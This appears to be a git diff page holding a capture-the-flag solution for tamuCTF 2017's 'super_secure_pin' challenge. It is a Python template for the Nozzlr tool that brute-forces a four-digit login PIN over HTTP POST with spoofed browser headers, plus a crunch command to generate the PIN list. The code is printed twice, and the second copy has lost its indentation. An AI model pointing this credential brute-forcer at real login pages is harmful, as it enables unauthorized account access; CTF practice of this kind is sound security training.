intrd · April 26, 2017 14:40
diff --git a/tamuCTF_web100-super_secure_pin.py b/tamuCTF_web100-super_secure_pin.py
 ## Nozzlr template : HTTP POST bruteforcer (Solution for tamuCTF 2017 - web100-super_secure_pin)
 # @author intrd - http://dann.com.br/ 
 # @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

 # generate pins wordlist using crunch: crunch 4 4 0123456789 -o pins.txt
 # then.. run this template on nozzlr: nozzlr http_bruteforce.py pins.txt 20

 import urllib, shutil, json
 import requests

 def nozz_module(payload, self=False, founds=False):
 	payloads=':'.join(str(v) for v in payload.values())

 	s = requests.session()

 	headers = {
 	    'Upgrade-Insecure-Requests': '1',
 	    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
 	    'Referer': 'http://pin.ctf.tamu.edu/',
 	}
 	result = s.get('http://pin.ctf.tamu.edu/login', headers=headers, verify=False)
 	cookies=s.cookies
 	#print result

 	headers = {
 	    'Origin': 'http://pin.ctf.tamu.edu',
 	    'Upgrade-Insecure-Requests': '1',
 	    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
 	    'Content-Type': 'application/x-www-form-urlencoded',
 	    'Referer': 'http://pin.ctf.tamu.edu/login'
 	}
 	postdata = {'pin': payload[0]} 

 	out={}
 	out["code"]=""
 	out["result"]=""
 	code="null"
 	try:
 		r = s.post('http://pin.ctf.tamu.edu/login', headers=headers, data=postdata, cookies=cookies, verify=False)
 		print r.content
 	except requests.exceptions.RequestException as e:
 		#print " "
 		out["result"]=format(str(e)).strip()
 		out["code"]="error"
 		return out
 	if "WRONG:" in r.content:
 		out["code"]="NEXT"
 	else:
 		print payloads
 		out["code"]="found: \""+payloads+"\""
 	return out
	## Nozzlr template : HTTP POST bruteforcer (Solution for tamuCTF 2017 - web100-super_secure_pin)
	# @author intrd - http://dann.com.br/
	# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

	# generate pins wordlist using crunch: crunch 4 4 0123456789 -o pins.txt
	# then.. run this template on nozzlr: nozzlr http_bruteforce.py pins.txt 20

	import urllib, shutil, json
	import requests

	def nozz_module(payload, self=False, founds=False):
	payloads=':'.join(str(v) for v in payload.values())

	s = requests.session()

	headers = {
	'Upgrade-Insecure-Requests': '1',
	'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
	'Referer': 'http://pin.ctf.tamu.edu/',
	}
	result = s.get('http://pin.ctf.tamu.edu/login', headers=headers, verify=False)
	cookies=s.cookies
	#print result

	headers = {
	'Origin': 'http://pin.ctf.tamu.edu',
	'Upgrade-Insecure-Requests': '1',
	'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
	'Content-Type': 'application/x-www-form-urlencoded',
	'Referer': 'http://pin.ctf.tamu.edu/login'
	}
	postdata = {'pin': payload[0]}

	out={}
	out["code"]=""
	out["result"]=""
	code="null"
	try:
	r = s.post('http://pin.ctf.tamu.edu/login', headers=headers, data=postdata, cookies=cookies, verify=False)
	print r.content
	except requests.exceptions.RequestException as e:
	#print " "
	out["result"]=format(str(e)).strip()
	out["code"]="error"
	return out
	if "WRONG:" in r.content:
	out["code"]="NEXT"
	else:
	print payloads
	out["code"]="found: \""+payloads+"\""
	return out